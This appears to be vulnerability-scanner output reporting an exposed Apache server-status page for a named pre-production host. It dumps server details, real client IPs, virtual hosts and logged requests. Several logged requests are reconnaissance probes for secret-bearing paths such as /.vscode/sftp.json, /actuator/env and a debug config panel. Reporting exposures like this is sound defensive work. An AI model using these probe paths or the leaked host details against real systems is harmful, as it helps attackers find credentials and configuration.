(open/recv/resp/push/rst) 2-163276490/710/1806_ 52.8323158687270.027.4764.44 104.22.1.64h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-163276490/792/1956_ 52.812148695730.021.5549.76 136.226.214.101http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 3-163275160/480/1836_ 40.62806070490.011.6762.02 172.71.30.34h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-163275160/498/1799_ 40.0031696911605230.061.3788.36 136.226.214.101http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-163275160/452/1693_ 39.8692078553400.043.1478.64 172.68.176.138h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-163275160/442/1716_ 40.58807462490.015.8462.03 108.162.241.25h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-163275160/472/1927_ 40.4092138814475740.025.9253.51 136.226.214.101http/1.1relehse.com:443POST /admin/evaluated/tree HTTP/1.1 3-163275160/418/1702_ 40.589206228700.015.0750.19 172.70.50.6h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-163275160/458/1850_ 40.5891013592720.014.6566.95 172.70.50.14h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-163275160/513/1926_ 40.52916059749860.015.8755.61 172.70.215.13h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-163275160/446/1848_ 40.579206893570.022.9557.76 172.71.120.50h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-163275160/466/1751_ 40.38316286629170.030.3948.08 136.226.214.101http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-163275170/70/780W 12.3400128130340.01.6554.40 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-163275170/92/739_ 12.471914348320.01.2935.58 172.69.130.86h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-163275170/72/791_ 12.501902751500.02.1953.76 172.70.80.53h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-163275170/73/884_ 12.548021414640.02.9053.19 172.71.31.165h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-163275170/75/893_ 12.54242214386520.01.8717.93 185.210.245.100h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-163275
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27ae9bf136
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 14-Dec-2025 09:03:35 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 1 day 1 hour 59 minutes 29 seconds Server load: 0.31 0.16 0.11 Total accesses: 14236 - Total Traffic: 592.3 MB - Total Duration: 12358977 CPU Usage: u19.88 s18.74 cu81.57 cs69.1 - .202% CPU load .152 requests/sec - 6.5 kB/second - 42.6 kB/request - 868.15 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 066632no2yes010011 166498no0yes010000 266499no0yes010000 366500no2yes19001 466501no1yes010000 Sum505 149012 ____________________________________W_____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5666320/119/661_ 9.8412783881400.01.0533.52 172.71.247.17h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5666320/123/662_ 9.86306314040.01.3411.65 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-5666320/127/681_ 9.8122873840120.01.7324.67 172.70.240.194h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5666320/119/686_ 9.8653317486630.02.6515.79 172.70.248.158h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5666320/102/668_ 9.8213349986350.01.5315.62 172.68.192.210h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-5666320/120/650_ 9.83327213568480.02.9727.30 172.71.148.157h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5666320/127/707_ 9.86109377590.01.4815.47 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-5666320/131/670_ 9.86004755690.01.8020.53 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-5666320/122/657_ 9.8623233804600.02.2313.34 172.70.248.158h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-5666320/114/687_ 9.86404725370.02.6518.22 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-5664980/4/43_ 4.7714561969510.00.031.60 162.158.120.204h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-5664980/5/40_ 1.5914510109540.00.011.35 103.23.60.244h27f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-5664980/11/43_ 4.7714515085470.00.0522.34 162.158.172.31h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5664980/7/48_ 4.78145529795880.00.111.62 172.64.198.79h2lcftech.es:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-5664980/9/37_ 4.77145110385670.00.041.04 172.64.198.79h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5664980/7/42_ 4.761451215122210.00.031.35 162.158.172.95h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5664980/5/44_ 4.7714561979280.00.033.07 162.158.172.31h2lcftech.es:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-5664980/4/30_ 4.7714502966160.00.031.39 172.64.198.79h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-5664980/4/37_ 4.7714501942540.00.037.67 162.158.172.31h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-5664980/3/38_ 0.6114510104610.00.011.50 107.172.195.86http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5664990/5/69_ 0.4014500218860.00.0111.85 172.104.241.98http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/v2/hoverfly/version HTTP/1.1 2-5664990/4/75_ 2.57362190930.00.011.35 162.158.41.195h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5664990/5/84_ 3.97365678349480.00.021.20 209.38.226.18http/1.1barrerasdecontencion.com:443GET / HTTP/1.1 2-5664990/6/91_ 0.39360255990.00.021.27 107.172.195.86http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5664990/6/119_ 5.144121350900.00.024.14 188.114.111.92h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5664990/5/77_ 0.4136560236300.00.021.53 209.38.226.18h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-5664990/4/110_ 0.3914500254260.00.012.64 172.104.241.98http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-5664990/9/86_ 4.671455936290380.00.142.97 172.64.198.45h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-5664990/8/85_ 2.583656299276730.00.124.35 209.38.226.18http/1.1 2-5664990/5/83_ 0.4136520196990.00.011.86 172.104.241.98http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5665000/108/140_ 8.759332261580.00.9213.17 172.71.172.53h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5665000/118/147_ 8.800327287250.01.475.10 104.23.239.81h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5665000/128/153_ 8.774301414010.01.952.31 162.158.111.35h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5665000/117/146_ 8.766325305380.02.0115.65 172.69.150.177h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5665000/114/135_ 8.779301242510.03.574.74 172.70.248.158h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5665000/120/139_ 8.79021288980.01.552.74 195.76.176.6h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5665000/113/146W 8.6700285740.01.193.26 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-5665000/107/131_ 8.7760395130.01.283.49 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5665000/111/136_ 8.7960200640.01.853.56 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-5665000/115/137_ 8.769335248410.01.111.47 172.71.164.230h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5665010/2/489_ 2.6446603781655190.00.0335.83 172.70.43.54h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5665010/9/441_ 0.45143313752710.00.0915.51 107.172.195.86http/1.1 4-5665010/9/484_ 5.17193431582370.00.1145.23 172.70.250.232h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5665010/9/461_ 3.05143417504980.00.1043.32 159.89.127.165http/1.1relehse.com:443GET /v2/_catalog HTTP/1.1 4-5665010/5/498_ 0.4021011063480.00.0112.02 172.104.241.98http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5665010/3/477_ 2.6646601511478370.00.0134.63 172.70.43.54h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-5665010/7/515_ 5.1843221615590.00.2719.05 172.71.148.157h2lcftech.es:443idle, streams: 0/1/1/0/0 (
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b273a6879e2
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 13-Dec-2025 13:26:34 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 6 hours 22 minutes 28 seconds Server load: 0.00 0.03 0.00 Total accesses: 3504 - Total Traffic: 137.1 MB - Total Duration: 9188978 CPU Usage: u24.2 s22.28 cu0 cs0 - .203% CPU load .153 requests/sec - 6.1 kB/second - 40.1 kB/request - 2622.43 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0990no4yes19030 1991no1yes010000 2992no0yes010000 3993no0yes010000 41338no3yes010001 Sum508 149031 _________W________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-09900/164/164_ 12.10202489650.03.463.46 172.68.22.191h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/161/161_ 11.8541674868120.03.713.71 52.42.138.194http/1.1 0-09900/165/165_ 12.09102198740.04.034.03 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-09900/197/197_ 12.0917745977190.03.823.82 162.158.90.6h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/147/147_ 12.10108416540.02.292.29 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-09900/146/146_ 12.093712183560.03.653.65 108.162.246.89h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/185/185_ 12.10207862440.03.383.38 185.242.226.15http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01 0-09900/170/170_ 12.0012543446780.04.454.45 104.23.223.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/151/151_ 12.0624632376080.02.652.65 104.23.221.43h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/165/165W 11.97003132280.03.453.45 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-09910/17/17_ 5.721452018690.00.250.25 172.68.92.201h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/14/14_ 6.48145746840.00.120.12 34.32.146.22http/1.1cinre-backend.tandemhse.com:443GET / HTTP/1.1 1-09910/9/9_ 6.425011000.00.050.05 162.158.120.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/13/13_ 5.70008060.00.450.45 172.68.92.203h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/12/12_ 4.810011940.00.120.12 172.68.92.202h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/13/13_ 5.732105091420.00.130.13 117.33.163.216http/1.1barrerasdecontencion.com:80GET / HTTP/1.1 1-09910/11/11_ 6.9021023040.00.170.17 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 1-09910/7/7_ 4.811452026500.00.090.09 172.68.92.186h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-09910/11/11_ 6.481457137020.00.310.31 34.32.146.22http/1.1cinre-backend.tandemhse.com:443GET /admin HTTP/1.1 1-09910/11/11_ 6.90517100.00.170.17 172.68.22.98h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/11/11_ 6.6621016790.00.810.81 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 2-09920/8/8_ 6.2021019920.00.630.63 162.158.122.161h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/14/14_ 4.711706056470.00.150.15 162.158.123.153h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/11/11_ 6.676032480.00.270.27 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-09920/10/10_ 4.88170609300.00.690.69 172.68.134.189h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/7/7_ 4.531706117800.00.060.06 172.68.92.167h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/12/12_ 4.841706030650.00.170.17 172.68.92.209h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/9/9_ 6.203015960.00.190.19 162.158.120.137h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/11/11_ 4.531706060470.00.060.06 172.68.92.181h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/5/5_ 5.9217062216280.00.010.01 172.68.135.35h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/8/8_ 4.592154560.00.330.33 172.68.92.214h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/10/10_ 6.752104880.00.040.04 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 3-09930/10/10_ 4.3417063628380.00.210.21 162.159.113.12h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/8/8_ 5.60170639621500.012.9212.92 172.68.92.176h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/4/4_ 4.5932090560.00.050.05 172.68.92.214h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-09930/7/7_ 6.3913940270.00.050.05 95.215.0.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /aaa9 HTTP/1.1 3-09930/13/13_ 5.87139407710.00.870.87 172.71.154.217h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/7/7_ 5.86170651147800.00.170.17 172.68.134.212h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/10/10_ 6.32171104370.00.200.20 162.158.120.212h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/6/6_ 6.321711046180.00.120.12 162.158.122.102h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/155/155_ 12.7320513140.05.905.90 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-013380/149/149_ 12.5922502672560.03.663.66 172.70.39.195h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-013380/153/153_ 12.7410590600.02.862.86 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-013380/147/147_ 12.74138016524390.035.3435.34 108.162.245.51h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/162/162_ 12.76059984760.03.323.32 108.162.245.33h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/159/159_ 12.7410429040.04.544.54 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-013380/141/141_ 12.440361372630.07.777.77 172.71.124.97h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/182/182_ 12.7610425810.010.7910.7
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27143776ae
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 10-Dec-2025 10:40:28 CET Restart Time: Friday, 05-Dec-2025 09:04:50 CET Parent Server Config. Generation: 31 Parent Server MPM Generation: 30 Server uptime: 5 days 1 hour 35 minutes 37 seconds Server load: 0.25 0.28 0.31 Total accesses: 165186 - Total Traffic: 4.5 GB - Total Duration: 196129505 CPU Usage: u49.48 s38.66 cu862.01 cs444.49 - .319% CPU load .377 requests/sec - 10.7 kB/second - 28.4 kB/request - 1187.33 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03807419no1yes28000 13807421no1yes010000 23807422no1yes010000 33807420no0yes010000 43807553no0yes010000 Sum503 248000 ___K_W____________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3038074190/517/1738_ 22.750015612340.08.4647.57 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3038074190/474/1658_ 22.6612714729790.013.6965.31 195.76.176.6h2relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-3038074190/457/1611_ 22.772015561650.08.4230.72 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-3038074191/485/1656K 22.7701315400682.46.9165.51 185.210.245.100h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3038074190/524/1771_ 22.774016353180.07.1731.22 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3038074190/553/1756W 22.740016165340.09.7442.42 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-3038074190/524/1722_ 22.7702230510040.08.6041.84 77.225.201.248h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3038074190/408/1624_ 22.752017072180.012.0973.05 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-3038074190/463/1628_ 22.7516114815430.06.8641.80 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3038074190/515/1727_ 22.7452117175450.015.1043.18 213.0.55.154h2cinre-backend.tandemhse.com:443done, streams: 0/9/9/0/0 (open/recv/resp/push/rst) 1-3038074210/221/4881_ 11.833056724520.02.48136.59 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-3038074210/175/4833_ 11.823553109743310.07.07127.17 172.68.243.55h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3038074210/188/4860_ 11.83337565788510.023.90148.06 141.101.76.183h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3038074210/196/4813_ 11.813054076480.02.65132.12 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-3038074210/234/4910_ 11.793059639780.03.02146.62 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-3038074210/205/4904_ 11.84258466132310.015.39151.92 172.68.243.55h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 1-3038074210/232/4976_ 11.82452465252290.02.42129.19 172.68.243.55h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3038074210/192/4934_ 11.8135779366770.02.89130.81 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3038074210/217/4883_ 11.851041470820.06.89127.32 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3038074210/251/4986_ 11.83363642751180.03.27117.39 172.68.243.55h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-3038074220/31/3347_ 7.22209234788450.01.5779.79 162.158.120.247h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3038074220/23/3366_ 7.21204028023990.07.3695.79 104.22.23.46h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3038074220/13/3358_ 6.1415027883510.00.10134.98 162.158.167.113h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3038074220/25/3320_ 7.22204026245830.00.6265.58 162.158.122.133h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3038074220/18/3308_ 7.11199041800730.00.6775.07 172.68.229.220h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3038074220/23/3306_ 6.96209026414190.01.2095.41 172.68.234.105h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3038074220/27/3298_ 7.2115026148200.00.16113.95 162.158.122.44h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3038074220/24/3239_ 7.21199026561770.04.8768.61 162.158.122.132h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3038074220/25/3339_ 7.12209025378770.01.2296.06 141.101.98.30h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3038074220/18/3204_ 7.30205026278760.00.1064.70 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3038074200/22/1968_ 7.15210019443590.00.9281.10 141.101.98.15h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3038074200/26/2027_ 7.28214079336110.01.1776.65 162.158.122.48h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3038074200/23/1991_ 7.27209119492680.01.4460.56 162.158.122.178h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3038074200/17/2024_ 7.17209019862970.00.9340.68 141.101.99.17h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3038074200/23/1953_ 7.17210019333910.011.27112.50 172.68.229.168h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3038074200/21/1904_ 7.28209218530180.01.0296.74 162.158.122.147h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3038074200/16/1954_ 7.18210019710180.00.2082.33 172.71.241.39h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3038074200/25/1903_ 7.28209118289960.01.0277.95 162.158.122.28h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3038074200/29/2044_ 7.17209018717570.00.9952.91 172.71.178.11h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3038074200/24/1908_ 7.29207117788720.01.6561.17 212.30.33.38h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3038075530/306/4658_ 15.97209046417030.06.40105.97 162.158.216.2h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3038075530/374/4657_ 15.94210047058530.05.0188.36 172.70.162.113h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3038075530/369/4724_ 16.09208067025700.05.08103.78 195.132.35.238h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3038075530/383/4700_ 16.08210082409000.08.76136.04 162.158.120.149h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3038075530/363/4676_ 16.08209042110050.05.98108.96 162.158.122.68h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-30</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27fcc8112d
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 10-Dec-2025 01:17:45 CET Restart Time: Friday, 05-Dec-2025 09:04:50 CET Parent Server Config. Generation: 29 Parent Server MPM Generation: 28 Server uptime: 4 days 16 hours 12 minutes 55 seconds Server load: 0.05 0.09 0.16 Total accesses: 151042 - Total Traffic: 4.1 GB - Total Duration: 191298254 CPU Usage: u9.15 s12.11 cu836.94 cs428.99 - .319% CPU load .374 requests/sec - 10.7 kB/second - 28.7 kB/request - 1266.52 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03795819no0yes010000 13795821no2yes010001 23795822no0yes010000 33795820no1yes19000 43795952no2yes010001 Sum505 149002 ______________________________________W___________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2837958190/2/1211_ 0.0310014303060.00.0038.89 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-2837958190/1/1178_ 0.039013735140.00.0051.51 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-2837958190/1/1147_ 0.0273414525610.00.0022.17 146.190.242.161http/1.1pre.relehse.com:443POST /api/gql HTTP/1.1 0-2837958190/0/1163_ 0.006014225320.00.0057.80 205.185.127.174http/1.1barrerasdecontencion.com:80POST ///wp-login.php?wp_lang=e HTTP/1.1 0-2837958190/2/1240_ 0.031015014690.00.0023.91 